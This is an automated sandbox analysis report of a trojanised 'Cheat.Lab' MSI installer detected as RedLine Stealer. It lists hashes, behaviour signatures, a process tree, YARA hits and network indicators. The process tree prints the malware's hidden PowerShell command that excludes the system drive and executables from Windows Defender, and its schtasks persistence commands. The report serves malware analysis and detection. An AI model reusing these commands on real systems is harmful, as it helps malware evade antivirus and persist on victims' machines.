Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cheat.Lab.2.7.1.msi

Overview

General Information

Sample Name:Cheat.Lab.2.7.1.msi
Analysis ID:1337007
MD5:c4acca57ad39174ba629781057f491e6
SHA1:2b2e7ae4386d7c7527636de18a728719c298e38b
SHA256:a62db9a4b61d64f93c9352820da477026ab7ba3f0cabe119c201ae0ecbac82c7
Tags:msiRedlineStealer
Infos:

Detection

RedLine
Score:44
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Drops large PE files
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Contains functionality to launch a program with higher privileges
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 2364 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3812 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4028 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • LuaJIT.exe (PID: 7400 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
        • schtasks.exe (PID: 7676 cmdline: schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7684 cmdline: schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • connect.exe (PID: 8016 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: A8A24AF1D9E83BE788BD28D64967FE32)
          • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WerFault.exe (PID: 1576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • msiexec.exe (PID: 4592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1264 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI7D5A.tmp (PID: 6768 cmdline: C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat MD5: B9545ED17695A32FACE8C3408A6A3553)
      • cmd.exe (PID: 5524 cmdline: C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7172 cmdline: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • NzEx.exe (PID: 7768 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • LuaJIT.exe (PID: 7856 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • LuaJIT.exe (PID: 7932 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      21.2.connect.exe.20b0000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        21.2.connect.exe.20b0000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x3f8ca:$v2_1: ListOfProcesses
        • 0x3f40e:$v4_3: base64str
        • 0x415d0:$v4_4: stringKey
        • 0x3b177:$v4_5: BytesToStringConverted
        • 0x3a520:$v4_6: FromBase64
        • 0x3bddf:$v4_8: procName
        • 0x3acff:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        21.2.connect.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          21.2.connect.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1fc94:$s5: delete[]
          • 0x1eb48:$s6: constructor or from DllMain.
          • 0x618da:$v2_1: ListOfProcesses
          • 0x6141e:$v4_3: base64str
          • 0x635e0:$v4_4: stringKey
          • 0x5d187:$v4_5: BytesToStringConverted
          • 0x5c530:$v4_6: FromBase64
          • 0x5ddef:$v4_8: procName
          • 0x5cd0f:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab CorpJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1Jump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: mscorlib.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.pdb0 source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI7CBC.tmp.1.dr
          Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A7AF79 FindFirstFileExW,6_2_00A7AF79
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: unknownDNS query: name: ip-api.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: connect.exe.11.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: connect.exe.11.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: connect.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: connect.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: connect.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, connect.exe.11.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://t2.symcb.com0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
